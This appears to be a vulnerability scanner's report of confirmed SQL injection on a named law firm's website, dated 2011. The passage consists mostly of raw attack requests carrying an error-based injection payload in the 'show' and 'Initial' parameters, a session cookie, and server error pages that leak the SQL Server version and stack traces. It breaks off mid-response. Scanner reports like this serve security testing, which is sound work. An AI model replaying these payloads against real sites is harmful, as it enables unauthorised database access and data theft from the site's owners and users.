[SqlException]: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.
at System.Data.SqlClient.SqlDataReader.Read()
at Mccarter.Saturno.Web.showlocationnew.Page_Load(Object sender, EventArgs e)
at System.Web.UI.Control.OnLoad(EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain()
[HttpUnhandledException]: Exception of type System.Web.HttpUnhandledException was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain()
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.CallHandlerExecutionStep.System.Web.HttpApplication+IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
- /new/showbionew.aspx

/new/showbionew.aspx CONFIRMED

http://www.mccarter.com/new/showbionew.aspx?show='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCH..

Parameters

Parameter Type Value
show GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
Related GET 3
__VIEWSTATE POST dDwtMTc1NDMyNTc3Njt0PDtsPGk8Mj47aTw0PjtpPDY O2k8OD47aTwxMD47PjtsPHQ8cDxsPFRleHQ7PjtsPEJ1cnRvbiBXaW5uaWNrOz4 Ozs O3Q8cDxsPFRleHQ7PjtsPFw8TUVUQSBOQU1FPSJLRVlXT1JEUyIgQ09OVEVOVD0iQnVydG9uLFdpbm5pY2ssQnVydG9uIFdpbm5pY2ssQ29ycG9yYXRlLCBTZWN1cml0aWVzIGFuZCBGaW5hbmNpYWwgSW5zdGl0dXRpb25zLFJlYWwgRXN0YXRlLFJlZGV2ZWxvcG1lbiIgXD4gOz4 Ozs O3Q8cDxsPFRleHQ7PjtsPFw8TUVUQSBOQU1FPSJERVNDUklQVElPTiIgQ09OVEVOVD0iDQogTXIuIFdpbm5pY2sgaXMgb2ZmaWNlIG1hbmFnaW5nIHBhcnRuZXIgb2YgdGhlIGZpcm0ncyBCb3N0b24gT2ZmaWNlIGFuZCBhIHJlYWwgZXN0YXRlIHBhcnRuZXIgaW4gdGhlIGZpcm0ncyBSZWFsIEVzdGF0ZS8gQ29uc3RydWN0aW9uLyBFbnZpcm9ubWVudGFsIFByYWN0aWNlIEdyb3VwLiBIZSZuYnNwXDtyZXByZXNlbnRzIGxlbmRlcnMgaW4gbmVnb3RpYXRpbmcgYW5kIGRvY3VtZW50aW5nIHNlY3VyZWQgbG9hbiB0cmFuc2FjdGlvbnMiXD47Pj47Oz47dDw7bDxpPDA Oz47bDx0PHA8bDxUZXh0Oz47bDxcPHNjcmlwdFw YWxwaGEgPSBbJ0EnLCdCJywnQycsJ0QnLCdFJywnRicsJ0cnLCdIJywnSScsJ0onLCdLJywnTCcsJ00nLCdOJywnTycsJ1AnLCdRJywnUicsJ1MnLCdUJywnVScsJ1YnLCdXJywnWCcsJ1knLCdaJ11cO1w8L3NjcmlwdFw Oz4 Ozs Oz4 O3Q8O2w8aTwxMz47PjtsPHQ8O2w8aTwxPjtpPDc O2k8OT47aTwxMT47aTwxMz47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8c3BhbiBzdHlsZT0iY29sb3I6IzAwMDAwMCJcPlw8Qlw UFJBQ1RJQ0VTXDwvQlw XDxCUlw XDwvc3Bhblw IFw8YSB0YXJnZXQ9Il90b3AiIGhyZWY9ImhvbWVuZXcuYXNweD9zZWFyY2hsaW5rPXNob3dhcmVhbmV3JlNob3c9OCJcPlJlYWwgRXN0YXRlXDwvYVw LCBcPGEgdGFyZ2V0PSJfdG9wIiBocmVmPSJob21lbmV3LmFzcHg/c2VhcmNobGluaz1zaG93YXJlYW5ldyZTaG93PTE1Ilw Q29ycG9yYXRlLCBTZWN1cml0aWVzIGFuZCBGaW5hbmNpYWwgSW5zdGl0dXRpb25zXDwvYVw LCBcPGEgdGFyZ2V0PSJfdG9wIiBocmVmPSJob21lbmV3LmFzcHg/c2VhcmNobGluaz1zaG93YXJlYW5ldyZTaG93PTE3Ilw UmVkZXZlbG9wbWVudFw8L2FcPlw8QlJcPjs Pjs7Pjt0PHA8bDxUZXh0Oz47bDxcPGRpdlw DQpcPHBcPk1yLiBXaW5uaWNrIGlzIG9mZmljZSBtYW5hZ2luZyBwYXJ0bmVyIG9mIHRoZSBmaXJtJ3MgQm9zdG9uIE9mZmljZSBhbmQgYSByZWFsIGVzdGF0ZSBwYXJ0bmVyIGluIHRoZSBmaXJtJ3MgUmVhbCBFc3RhdGUvIENvbnN0cnVjdGlvbi8gRW52aXJvbm1lbnRhbCBQcmFjdGljZSBHcm91cC4gSGUmbmJzcFw7cmVwcmVzZW50cyBsZW5kZXJzIGluIG5lZ290aWF0aW5nIGFuZCBkb2N1bWVudGluZyBzZWN1cmVkIGxvYW4gdHJhbnNhY3Rpb25zIGluY2x1ZGluZyByZWFsIGVzdGF0ZSBsb2FucywgY29uc3RydWN0aW9uIGxvYW5zLCBwcml2YXRlIGJhbmtpbmcgYW5kIGFzc2V0LWJhc2VkIGxvYW5zLCBsZXR0ZXJzIG9mIGNyZWRpdCwmbmJzcFw7YW5kIHBhcnRpY2lwYXRpb24gYW5kIGFnZW5jeSBhZ3JlZW1lbnRzLlw8c3Bhblw Jm5ic3BcOyBcPC9zcGFuXD5IZSBpcyBhbHNvIGV4cGVyaWVuY2VkIGluIGNvbXBsZXggcmVhbCBlc3RhdGUgYWNxdWlzaXRpb25zIGFuZCBkaXNwb3NpdGlvbnMsIGNvbW1lcmNpYWwgbGVhc2luZywgb3duZXJzaGlwIHN0cnVjdHVyZXMsIHRheC1kZWZlcnJlZCBleGNoYW5nZXMsIGxvYW4gcmVzdHJ1Y3R1cmluZywgZm9yYmVhcmFuY2UgYWdyZWVtZW50cywgIndvcmtvdXRzIiBhbmQgZm9yZWNsb3N1cmVzLlw8c3Bhblw Jm5ic3BcOyBcPC9zcGFuXD5Nci4gV2lubmljayBoYXMgZXh0ZW5zaXZlIGV4cGVyaWVuY2UgaW4gcHJvcGVydHkgaW5zdXJhbmNlIG1hdHRlcnMgaW5jbHVkaW5nIHRoZSBoYW5kbGluZyBvZiBidWlsZGluZywgY29udGVudHMgYW5kIGJ1c2luZXNzIGludGVycnVwdGlvbiBjbGFpbXMgYW5kIHRoZSBkZXRlcm1pbmF0aW9uIG9mIGxvc3MgYW5kIGRhbWFnZSB0aHJvdWdoIHRoZSBSZWZlcmVuY2UgKGFyYml0cmF0aW9uKSBwcm9jZXNzLlw8L3BcPg0KXDxwXD5Nci4gV2lubmljaydzIHByYWN0aWNlIGFsc28gZm9jdXNlcyBvbiBnZW5lcmFsIGNvcnBvcmF0ZSBtYXR0ZXJzIGFuZCBidXNpbmVzcyB0cmFuc2FjdGlvbnMgYW5kIGhlIGNvdW5zZWxzIGhpcyBidXNpbmVzcyBjbGllbnRlbGUgd2l0aCByZXNwZWN0IHRvIHRoZSBhY3F1aXNpdGlvbiBhbmQgZGlzcG9zaXRpb24gb2YgYnVzaW5lc3MgYXNzZXRzLCBmaW5hbmNpbmcsIHJlYWwgcHJvcGVydHksIGVxdWlwbWVudCBsZWFzaW5nLCBjb250cmFjdHVhbCBhbmQgZW1wbG95bWVudCBtYXR0ZXJzIGFuZCBzdWNjZXNzaW9uIHBsYW5uaW5nLlw8c3Bhblw Jm5ic3BcOyBcPC9zcGFuXD5JbiBhZGRpdGlvbiwgTXIuIFdpbm5pY2sgbWFpbnRhaW5zIGEgc2lnbmlmaWNhbnQgYXV0b21vdGl2ZSBwcmFjdGljZSB3aGljaCBpbmNsdWRlcyB0aGUgYWNxdWlzaXRpb24gYW5kL29yIHNhbGUgb2YgYXV0b21vdGl2ZSBkZWFsZXJzaGlwcyBhbmQgdGhlIGZpbmFuY2luZyB0aGVyZW9mLCBwcm9wZXJ0eSBhY3F1aXNpdGlvbiBvciBhc3NvY2lhdGVkIGxlYXNpbmcsIG1hbnVmYWN0dXJlcnMnIGFncmVlbWVudHMsIGNvbnRyb2wgYWdyZWVtZW50cywgZXF1aXBtZW50IGxlYXNlcyBhbmQgb3duZXJzaGlwIHN0cnVjdHVyZS5cPC9wXD4NClw8cFw XDxzcGFuXD5Nci4gV2lubmljayB3YXMgcmVjb2duaXplZCBhcyBhIE1hc3NhY2h1c2V0dHMgU3VwZXIgTGF3eWVyIGZvciAyMDA0LCAyMDA1LCAyMDA2Llw8L3NwYW5cPlw8L3BcPlw8L2Rpdlw Oz4 Ozs O3Q8cDxsPFRleHQ7PjtsPFw8YnJcPlw8c3BhbiBzdHlsZT0iY29sb3I6IzAwMDAwMCJcPlw8Qlw RURVQ0FUSU9OXDwvYlw XDwvc3Bhblw XDxiclw XDxiclw TEwuQi4sIEJvc3RvbiBVbml2ZXJzaXR5IFNjaG9vbCBvZiBMYXcsIDE5NjZcPGJyXD5cPGltZyBhbGlnbj1taWRkbGUgc3JjPSJpbWFnZXMvYmxuay5naWYiIGJvcmRlcj0wIHdpZHRoPTEgaGVpZ2h0PTEgdnNwYWNlPTNcPlw8YnJcPkIuUy4sIFN1ZmZvbGsgVW5pdmVyc2l0eSwgMTk2Mzs Pjs7Pjt0PHA8bDxUZXh0Oz47bDxcPHNwYW4gc3R5bGU9ImNvbG9yOiMwMDAwMDAiXD5cPEJcPlw8QlJcPkFETUlTU0lPTlNcPEJSXD5cPEJSXD5cPC9CXD5cPC9zcGFuXD4NCk1hc3NhY2h1c2V0dHNcPGJyXD5cPGltZyBhbGlnbj1taWRkbGUgc3JjPSJpbWFnZXMvYmxuay5naWYiIGJvcmRlcj0wIHdpZHRoPTEgaGVpZ2h0PTEgdnNwYWNlPTNcPlw8YnJcPg0KVS5TLiBEaXN0cmljdCBDb3VydCwgRGlzdHJpY3Qgb2YgTWFzc2FjaHVzZXR0c1w8YnJcPlw8aW1nIGFsaWduPW1pZGRsZSBzcmM9ImltYWdlcy9ibG5rLmdpZiIgYm9yZGVyPTAgd2lkdGg9MSBoZWlnaHQ9MSB2c3BhY2U9M1w XDxiclw DQpVbml0ZWQgU3RhdGVzIFN1cHJlbWUgQ291cnRcPGJyXD5cPGltZyBhbGlnbj1taWRkbGUgc3JjPSJpbWFnZXMvYmxuay5naWYiIGJvcmRlcj0wIHdpZHRoPTEgaGVpZ2h0PTEgdnNwYWNlPTNcPlw8YnJcPlw8aW1nIGFsaWduPW1pZGRsZSBzcmM9ImltYWdlcy9ibG5rLmdpZiIgYm9yZGVyPTAgd2lkdGg9MSBoZWlnaHQ9MSB2c3BhY2U9M1w Oz4 Ozs O3Q8cDxsPFRleHQ7PjtsPFw8c3BhbiBzdHlsZT0iY29sb3I6IzAwMDAwMCJcPlw8Qlw XDxCUlw TUVNQkVSU0hJUFMgQU5EIFBST0ZFU1NJT05BTCBBQ1RJVklUSUVTXDxCUlw XDxCUlw XDwvQlw XDwvc3Bhblw DQpBbWVyaWNhbiBCYXIgQXNzb2NpYXRpb25cPGJyXD5cPGltZyBhbGlnbj1taWRkbGUgc3JjPSJpbWFnZXMvYmxuay5naWYiIGJvcmRlcj0wIHdpZHRoPTEgaGVpZ2h0PTEgdnNwYWNlPTNcPlw8YnJcPg0KTWFzc2FjaHVzZXR0cyBCYXIgQXNzb2NpYXRpb25cPGJyXD5cPGltZyBhbGlnbj1taWRkbGUgc3JjPSJpbWFnZXMvYmxuay5naWYiIGJvcmRlcj0wIHdpZHRoPTEgaGVpZ2h0PTEgdnNwYWNlPTNcPlw8YnJcPg0KQm9zdG9uIEJhciBBc3NvY2lhdGlvblw8YnJcPlw8aW1nIGFsaWduPW1pZGRsZSBzcmM9ImltYWdlcy9ibG5rLmdpZiIgYm9yZGVyPTAgd2lkdGg9MSBoZWlnaHQ9MSB2c3BhY2U9M1w XDxiclw XDxpbWcgYWxpZ249bWlkZGxlIHNyYz0iaW1hZ2VzL2JsbmsuZ2lmIiBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIHZzcGFjZT0zXD47Pj47Oz47Pj47Pj47Pj47PryijcfGDjG090UG3nv5PdrW3XqQ

Extracted Data

microsoft sql server 2005 - 9.00.3042.00 (intel x86) feb 9 2007 22:47:07 copyright (c) 1988-2005 microsoft corporation standard edition on windows nt 5.2 (build 3790: service pack 2)

Request

POST /new/showbionew.aspx?show='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&Related=3 HTTP/1.1
Referer: http://www.mccarter.com/new/showbionew.aspx?show=1121&Related=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.mccarter.com
Cookie: ASP.NET_SessionId=dovbcr45tyczie45c0bmue45
Content-Length: 5788
Accept-Encoding: gzip, deflate

__VIEWSTATE=dDwtMTc1NDMyNTc3Njt0PDtsPGk8Mj47aTw0PjtpPDY%2bO2k8OD47aTwxMD47PjtsPHQ8cDxsPFRleHQ7PjtsPEJ1cnRvbiBXaW5uaWNrOz4%2bOzs%2bO3Q8cDxsPFRleHQ7PjtsPFw8TUVUQSBOQU1FPSJLRVlXT1JEUyIgQ09OVEVOVD0iQnVydG9uLFdpbm5pY2ssQnVydG9uIFdpbm5pY2ssQ29ycG9yYXRlLCBTZWN1cml0aWVzIGFuZCBGaW5hbmNpYWwgSW5zdGl0dXRpb25zLFJlYWwgRXN0YXRlLFJlZGV2ZWxvcG1lbiIgXD4gOz4%2bOzs%2bO3Q8cDxsPFRleHQ7PjtsPFw8TUVUQSBOQU1FPSJERVNDUklQVElPTiIgQ09OVEVOVD0iDQogTXIuIFdpbm5pY2sgaXMgb2ZmaWNlIG1hbmFnaW5nIHBhcnRuZXIgb2YgdGhlIGZpcm0ncyBCb3N0b24gT2ZmaWNlIGFuZCBhIHJlYWwgZXN0YXRlIHBhcnRuZXIgaW4gdGhlIGZpcm0ncyBSZWFsIEVzdGF0ZS8gQ29uc3RydWN0aW9uLyBFbnZpcm9ubWVudGFsIFByYWN0aWNlIEdyb3VwLiBIZSZuYnNwXDtyZXByZXNlbnRzIGxlbmRlcnMgaW4gbmVnb3RpYXRpbmcgYW5kIGRvY3VtZW50aW5nIHNlY3VyZWQgbG9hbiB0cmFuc2FjdGlvbnMiXD47Pj47Oz47dDw7bDxpPDA%2bOz47bDx0PHA8bDxUZXh0Oz47bDxcPHNjcmlwdFw%2bYWxwaGEgPSBbJ0EnLCdCJywnQycsJ0QnLCdFJywnRicsJ0cnLCdIJywnSScsJ0onLCdLJywnTCcsJ00nLCdOJywnTycsJ1AnLCdRJywnUicsJ1MnLCdUJywnVScsJ1YnLCdXJywnWCcsJ1knLCdaJ11cO1w8L3NjcmlwdFw%2bOz4%2bOzs%2bOz4%2bO3Q8O2w8aTwxMz47PjtsPHQ8O2w8aTwxPjtpPDc%2bO2k8OT47aTwxMT47aTwxMz47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8c3BhbiBzdHlsZT0iY29sb3I6IzAwMDAwMCJcPlw8Qlw%2bUFJBQ1RJQ0VTXDwvQlw%2bXDxCUlw%2bXDwvc3Bhblw%2bIFw8YSB0YXJnZXQ9Il90b3AiIGhyZWY9ImhvbWVuZXcuYXNweD9zZWFyY2hsaW5rPXNob3dhcmVhbmV3JlNob3c9OCJcPlJlYWwgRXN0YXRlXDwvYVw%2bLCBcPGEgdGFyZ2V0PSJfdG9wIiBocmVmPSJob21lbmV3LmFzcHg%2fc2VhcmNobGluaz1zaG93YXJlYW5ldyZTaG93PTE1Ilw%2bQ29ycG9yYXRlLCBTZWN1cml0aWVzIGFuZCBGaW5hbmNpYWwgSW5zdGl0dXRpb25zXDwvYVw%2bLCBcPGEgdGFyZ2V0PSJfdG9wIiBocmVmPSJob21lbmV3LmFzcHg%2fc2VhcmNobGluaz1zaG93YXJlYW5ldyZTaG93PTE3Ilw%2bUmVkZXZlbG9wbWVudFw8L2FcPlw8QlJcPjs%2bPjs7Pjt0PHA8bDxUZXh0Oz47bDxcPGRpdlw%2bDQpcPHBcPk1yLiBXaW5uaWNrIGlzIG9mZmljZSBtYW5hZ2luZyBwYXJ0bmVyIG9mIHRoZSBmaXJtJ3MgQm9zdG9uIE9mZmljZSBhbmQgYSByZWFsIGVzdGF0ZSBwYXJ0bmVyIGluIHRoZSBmaXJtJ3MgUmVhbCBFc3RhdGUvIENvbnN0cnVjdGlvbi8gRW52aXJvbm1lbnRhbCBQcmFjdGljZSBHcm91cC4gSGUmbmJzcFw7cmVwcmVzZW50cyBsZW5kZXJzIGluIG5lZ290aWF0aW5nIGFuZCBkb2N1bWVudGluZyBzZWN1cmVkIGxvYW4gdHJhbnNhY3Rpb25zIGluY2x1ZGluZyByZWFsIGVzdGF0ZSBsb2FucywgY29uc3RydWN0aW9uIGxvYW5zLCBwcml2YXRlIGJhbmtpbmcgYW5kIGFzc2V0LWJhc2VkIGxvYW5zLCBsZXR0ZXJzIG9mIGNyZWRpdCwmbmJzcFw7YW5kIHBhcnRpY2lwYXRpb24gYW5kIGFnZW5jeSBhZ3JlZW1lbnRzLlw8c3Bhblw%2bJm5ic3BcOyBcPC9zcGFuXD5IZSBpcyBhbHNvIGV4cGVyaWVuY2VkIGluIGNvbXBsZXggcmVhbCBlc3RhdGUgYWNxdWlzaXRpb25zIGFuZCBkaXNwb3NpdGlvbnMsIGNvbW1lcmNpYWwgbGVhc2luZywgb3duZXJzaGlwIHN0cnVjdHVyZXMsIHRheC1kZWZlcnJlZCBleGNoYW5nZXMsIGxvYW4gcmVzdHJ1Y3R1cmluZywgZm9yYmVhcmFuY2UgYWdyZWVtZW50cywgIndvcmtvdXRzIiBhbmQgZm9yZWNsb3N1cmVzLlw8c3Bhblw%2bJm5ic3BcOyBcPC9zcGFuXD5Nci4gV2lubmljayBoYXMgZXh0ZW5zaXZlIGV4cGVyaWVuY2UgaW4gcHJvcGVydHkgaW5zdXJhbmNlIG1hdHRlcnMgaW5jbHVkaW5nIHRoZSBoYW5kbGluZyBvZiBidWlsZGluZywgY29udGVudHMgYW5kIGJ1c2luZXNzIGludGVycnVwdGlvbiBjbGFpbXMgYW5kIHRoZSBkZXRlcm1pbmF0aW9uIG9mIGxvc3MgYW5kIGRhbWFnZSB0aHJvdWdoIHRoZSBSZWZlcmVuY2UgKGFyYml0cmF0aW9uKSBwcm9jZXNzLlw8L3BcPg0KXDxwXD5Nci4gV2lubmljaydzIHByYWN0aWNlIGFsc28gZm9jdXNlcyBvbiBnZW5lcmFsIGNvcnBvcmF0ZSBtYXR0ZXJzIGFuZCBidXNpbmVzcyB0cmFuc2FjdGlvbnMgYW5kIGhlIGNvdW5zZWxzIGhpcyBidXNpbmVzcyBjbGllbnRlbGUgd2l0aCByZXNwZWN0IHRvIHRoZSBhY3F1aXNpdGlvbiBhbmQgZGlzcG9zaXRpb24gb2YgYnVzaW5lc3MgYXNzZXRzLCBmaW5hbmNpbmcsIHJlYWwgcHJvcGVydHksIGVxdWlwbWVudCBsZWFzaW5nLCBjb250cmFjdHVhbCBhbmQgZW1wbG95bWVudCBtYXR0ZXJzIGFuZCBzdWNjZXNzaW9uIHBsYW5uaW5nLlw8c3Bhblw%2bJm5ic3BcOyBcPC9zcGFuXD5JbiBhZGRpdGlvbiwgTXIuIFdpbm5pY2sgbWFpbnRhaW5zIGEgc2lnbmlmaWNhbnQgYXV0b21vdGl2ZSBwcmFjdGljZSB3aGljaCBpbmNsdWRlcyB0aGUgYWNxdWlzaXRpb24gYW5kL29yIHNhbGUgb2YgYXV0b21vdGl2ZSBkZWFsZXJzaGlwcyBhbmQgdGhlIGZpbmFuY2luZyB0aGVyZW9mLCBwcm9wZXJ0eSBhY3F1aXNpdGlvbiBvciBhc3NvY2lhdGVkIGxlYXNpbmcsIG1hbnVmYWN0dXJlcnMnIGFncmVlbWVudHMsIGNvbnRyb2wgYWdyZWVtZW50cywgZXF1aXBtZW50IGxlYXNlcyBhbmQgb3duZXJzaGlwIHN0cnVjdHVyZS5cPC9wXD4NClw8cFw%2bXDxzcGFuXD5Nci4gV2lubmljayB3YXMgcmVjb2duaXplZCBhcyBhIE1hc3NhY2h1c2V0dHMgU3VwZXIgTGF3eWVyIGZvciAyMDA0LCAyMDA1LCAyMDA2Llw8L3NwYW5cPlw8L3BcPlw8L2Rpdlw%2bOz4%2bOzs%2bO3Q8cDxsPFRleHQ7PjtsPFw8YnJcPlw8c3BhbiBzdHlsZT0iY29sb3I6IzAwMDAwMCJcPlw8Qlw%2bRURVQ0FUSU9OXDwvYlw%2bXDwvc3Bhblw%2bXDxiclw%2bXDxiclw%2bTEwuQi4sIEJvc3RvbiBVbml2ZXJzaXR5IFNjaG9vbCBvZiBMYXcsIDE5NjZcPGJyXD5cPGltZyBhbGlnbj1taWRkbGUgc3JjPSJpbWFnZXMvYmxuay5naWYiIGJvcmRlcj0wIHdpZHRoPTEgaGVpZ2h0PTEgdnNwYWNlPTNcPlw8YnJcPkIuUy4sIFN1ZmZvbGsgVW5pdmVyc2l0eSwgMTk2Mzs%2bPjs7Pjt0PHA8bDxUZXh0Oz47bDxcPHNwYW4gc3R5bGU9ImNvbG9yOiMwMDAwMDAiXD5cPEJcPlw8QlJcPkFETUlTU0lPTlNcPEJSXD5cPEJSXD5cPC9CXD5cPC9zcGFuXD4NCk1hc3NhY2h1c2V0dHNcPGJyXD5cPGltZyBhbGlnbj1taWRkbGUgc3JjPSJpbWFnZXMvYmxuay5naWYiIGJvcmRlcj0wIHdpZHRoPTEgaGVpZ2h0PTEgdnNwYWNlPTNcPlw8YnJcPg0KVS5TLiBEaXN0cmljdCBDb3VydCwgRGlzdHJpY3Qgb2YgTWFzc2FjaHVzZXR0c1w8YnJcPlw8aW1nIGFsaWduPW1pZGRsZSBzcmM9ImltYWdlcy9ibG5rLmdpZiIgYm9yZGVyPTAgd2lkdGg9MSBoZWlnaHQ9MSB2c3BhY2U9M1w%2bXDxiclw%2bDQpVbml0ZWQgU3RhdGVzIFN1cHJlbWUgQ291cnRcPGJyXD5cPGltZyBhbGlnbj1taWRkbGUgc3JjPSJpbWFnZXMvYmxuay5naWYiIGJvcmRlcj0wIHdpZHRoPTEgaGVpZ2h0PTEgdnNwYWNlPTNcPlw8YnJcPlw8aW1nIGFsaWduPW1pZGRsZSBzcmM9ImltYWdlcy9ibG5rLmdpZiIgYm9yZGVyPTAgd2lkdGg9MSBoZWlnaHQ9MSB2c3BhY2U9M1w%2bOz4%2bOzs%2bO3Q8cDxsPFRleHQ7PjtsPFw8c3BhbiBzdHlsZT0iY29sb3I6IzAwMDAwMCJcPlw8Qlw%2bXDxCUlw%2bTUVNQkVSU0hJUFMgQU5EIFBST0ZFU1NJT05BTCBBQ1RJVklUSUVTXDxCUlw%2bXDxCUlw%2bXDwvQlw%2bXDwvc3Bhblw%2bDQpBbWVyaWNhbiBCYXIgQXNzb2NpYXRpb25cPGJyXD5cPGltZyBhbGlnbj1taWRkbGUgc3JjPSJpbWFnZXMvYmxuay5naWYiIGJvcmRlcj0wIHdpZHRoPTEgaGVpZ2h0PTEgdnNwYWNlPTNcPlw8YnJcPg0KTWFzc2FjaHVzZXR0cyBCYXIgQXNzb2NpYXRpb25cPGJyXD5cPGltZyBhbGlnbj1taWRkbGUgc3JjPSJpbWFnZXMvYmxuay5naWYiIGJvcmRlcj0wIHdpZHRoPTEgaGVpZ2h0PTEgdnNwYWNlPTNcPlw8YnJcPg0KQm9zdG9uIEJhciBBc3NvY2lhdGlvblw8YnJcPlw8aW1nIGFsaWduPW1pZGRsZSBzcmM9ImltYWdlcy9ibG5rLmdpZiIgYm9yZGVyPTAgd2lkdGg9MSBoZWlnaHQ9MSB2c3BhY2U9M1w%2bXDxiclw%2bXDxpbWcgYWxpZ249bWlkZGxlIHNyYz0iaW1hZ2VzL2JsbmsuZ2lmIiBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIHZzcGFjZT0zXD47Pj47Oz47Pj47Pj47Pj47PryijcfGDjG090UG3nv5PdrW3XqQ

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 18:35:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4166


<html>
<head>
<title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/new' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.]
System.Data.SqlClient.SqlDataReader.Read() +176
Mccarter.Saturno.Web.showbionew.Page_Load(Object sender, EventArgs e)
System.Web.UI.Control.OnLoad(EventArgs e) +67
System.Web.UI.Control.LoadRecursive() +35
System.Web.UI.Page.ProcessRequestMain() +750
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:1.1.4322.2407; ASP.NET Version:1.1.4322.2470

</font>

</body>
</html>
<!--
[SqlException]: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.
at System.Data.SqlClient.SqlDataReader.Read()
at Mccarter.Saturno.Web.showbionew.Page_Load(Object sender, EventArgs e)
at System.Web.UI.Control.OnLoad(EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain()
[HttpUnhandledException]: Exception of type System.Web.HttpUnhandledException was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain()
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.CallHandlerExecutionStep.System.Web.HttpApplication+IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
- /new/biosnew.aspx

/new/biosnew.aspx CONFIRMED

http://www.mccarter.com/new/biosnew.aspx?ShowLast=True&Initial='%2B%20(select+convert(int,CHAR(95)%2..

Parameters

Parameter Type Value
ShowLast GET True
Initial GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Extracted Data

microsoft sql server 2005 - 9.00.3042.00 (intel x86) feb 9 2007 22:47:07 copyright (c) 1988-2005 microsoft corporation standard edition on windows nt 5.2 (build 3790: service pack 2)

Request

GET /new/biosnew.aspx?ShowLast=True&Initial='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: http://www.mccarter.com/new/biosnew.aspx?search=&Location=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.mccarter.com
Cookie: ASP.NET_SessionId=dovbcr45tyczie45c0bmue45
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 18:38:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6212


<html>
<head>
<title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
